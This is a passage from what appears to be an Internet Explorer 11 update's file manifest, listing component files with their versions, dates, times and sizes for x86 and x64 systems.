\nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:48| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:47| 13,881,856 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:40| 24,486 \nieinstal.exe| 11.0.9600.18921| 9-Feb-2018| 21:35| 475,648 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:30| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:38| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:30| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:28| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:28| 436,651 \ninetres.admx| Not versioned| 11-Jan-2021| 19:25| 1,678,023 \ninetcomm.dll| 6.3.9600.20112| 13-Aug-2021| 19:39| 880,640 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 21:14| 84,480 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 19:52| 4,119,040 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 19:56| 653,824 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:04| 498,176 \n \n### \n\n__\n\nInternet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 21:30| 2,882,048 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 21:22| 108,544 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 19:18| 65,024 \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 19:28| 1,562,624 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 23:30| 817,296 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 21:51| 43,008 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:35| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:01| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:59| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:20| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:00| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:59| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:58| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:02| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:57| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:57| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:22| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 31,232 \nhtml.iec| 2019.0.0.20045| 4-Jun-2021| 22:23| 417,280 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:42| 2,132,992 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:17| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:18| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:33| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:18| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:13| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:23| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:13| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:06| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:17| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 20:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:22| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:47| 77,824 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 276,480 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:08| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:23| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:14| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 35,328 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:48| 4,858,880 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 21:57| 54,784 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:16| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:39| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:38| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 2:49| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:38| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:39| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:40| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:40| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 2:53| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:36| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:21| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:19| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 2:53| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:21| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:19| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:16| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:18| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:16| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 13-Aug-2021| 23:22| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:18| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:14| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:16| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 75,776 \nieui.dll| 11.0.9600.20045| 4-Jun-2021| 22:15| 615,936 \niedkcs32.dll| 18.0.9600.20045| 4-Jun-2021| 21:45| 381,952 \ninstall.ins| Not versioned| 13-Aug-2021| 17:52| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:22| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:11| 800,768 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:41| 145,920 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 21:40| 33,280 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:47| 88,064 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.18895| 1-Jan-2018| 21:32| 666,624 \niedvtool.dll| 11.0.9600.20045| 5-Jun-2021| 0:16| 950,784 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:21| 50,176 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:53| 491,008 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 316,416 \nEscMigPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 124,416 \nescUnattend.exe| 11.0.9600.19326| 25-Mar-2019| 22:54| 87,040 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:51| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 20:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:23| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:51| 245,248 \nF12Resources.dll| 11.0.9600.17496| 21-Nov-2014| 19:00| 10,949,120 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:50| 372,224 \nF12.dll| 11.0.9600.20045| 4-Jun-2021| 21:50| 1,422,848 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:42| 809,472 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:54| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 23:54| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 5:16| 60,416 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 22:08| 12,800 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 22:12| 13,824 \nmshtmled.dll| 11.0.9600.20045| 4-Jun-2021| 21:55| 92,672 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 22:07| 25,759,232 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 3:30| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:41| 3,228 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 21:54| 132,096 \nieetwcollector.exe| 11.0.9600.18895| 1-Jan-2018| 21:17| 116,224 \nieetwproxystub.dll| 11.0.9600.18895| 1-Jan-2018| 21:28| 48,640 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 3:30| 4,096 \nielowutil.exe| 11.0.9600.17416| 30-Oct-2014| 21:55| 222,720 \nieproxy.dll| 11.0.9600.20045| 4-Jun-2021| 21:13| 870,400 \nIEShims.dll| 11.0.9600.19650| 11-Feb-2020| 4:29| 387,072 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 22:10| 167,424 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 22:12| 143,872 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:08| 51,712 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 20:25| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 20:25| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 20:25| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 20:25| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:51| 5,430 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 21:51| 144,384 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Aug-2021| 22:36| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 591,872 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 628,736 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 1,862,656 \nMshtmlDac.dll| 11.0.9600.19846| 23-Sep-2020| 21:25| 88,064 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 18:38| 1,217,024 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 21:19| 152,064 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:43| 65 \nwebcheck.dll| 11.0.9600.20045| 4-Jun-2021| 21:44| 262,144 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:44| 65 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 579,192 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 403,592 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 107,152 \nmsrating.dll| 11.0.9600.18895| 1-Jan-2018| 20:56| 199,680 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:32| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:32| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 21:56| 2,916,864 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:28| 728,064 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 21:56| 34,304 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 22:06| 66,560 